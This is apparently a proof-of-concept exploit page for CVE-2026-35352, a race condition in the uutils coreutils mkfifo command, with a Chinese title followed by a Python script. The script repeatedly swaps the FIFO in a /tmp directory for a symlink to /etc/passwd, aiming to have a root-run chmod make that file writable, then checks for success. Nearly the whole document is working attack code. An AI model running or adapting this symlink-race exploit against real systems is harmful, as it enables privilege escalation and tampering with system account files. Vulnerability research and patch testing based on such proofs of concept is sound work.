CVE-2026-35352 uutils coreutils mkfifo 竞态条件漏洞

#!/usr/bin/env python3 """ PoC for CVE-2026-35352: TOCTOU Race Condition in uutils coreutils mkfifo This script attempts to exploit the race condition between mkfifo creation and chmod. """ import os import time import sys # Configuration FIFO_NAME = "vuln_fifo" TARGET_FILE = "/etc/passwd" # Target file to modify permissions WORK_DIR = "/tmp/cve_2026_35352_poc" def setup(): """Create the working directory""" if not os.path.exists(WORK_DIR): os.makedirs(WORK_DIR) os.chdir(WORK_DIR) print(f"[*] Working in {WORK_DIR}") def exploit(): """ Simulates the race condition. Note: In a real scenario, this must be run concurrently with the vulnerable mkfifo process. The goal is to swap the FIFO with a symlink before chmod is called. """ print("[*] Starting race condition loop...") print("[*] Waiting for the vulnerable process (mkfifo) to create the FIFO...") attempts = 0 while attempts < 10000: try: # Check if FIFO exists and is not a symlink (the window of opportunity) if os.path.exists(FIFO_NAME) and not os.path.islink(FIFO_NAME): # Attempt to swap the file with a symlink to a privileged file os.remove(FIFO_NAME) os.symlink(TARGET_FILE, FIFO_NAME) print(f"[+] Attempt {attempts}: Swapped {FIFO_NAME} with symlink to {TARGET_FILE}") # Verify if the exploit was successful (check if target is writable) # This assumes the chmod 777 (or similar) happened on the target if os.access(TARGET_FILE, os.W_OK): print(f"[+] SUCCESS! {TARGET_FILE} is now writable.") return True # If it's already a symlink, reset it to allow the race to continue (simulation) elif os.path.islink(FIFO_NAME): os.remove(FIFO_NAME) except FileNotFoundError: pass except Exception as e: print(f"[-] Error: {e}") attempts += 1 time.sleep(0.0001) # Short sleep to reduce CPU usage print("[-] Failed to win race condition within the limit.") return False if __name__ == "__main__": if os.geteuid() != 0: print("[!] Warning: This exploit usually requires the victim process to run as root.") setup() exploit()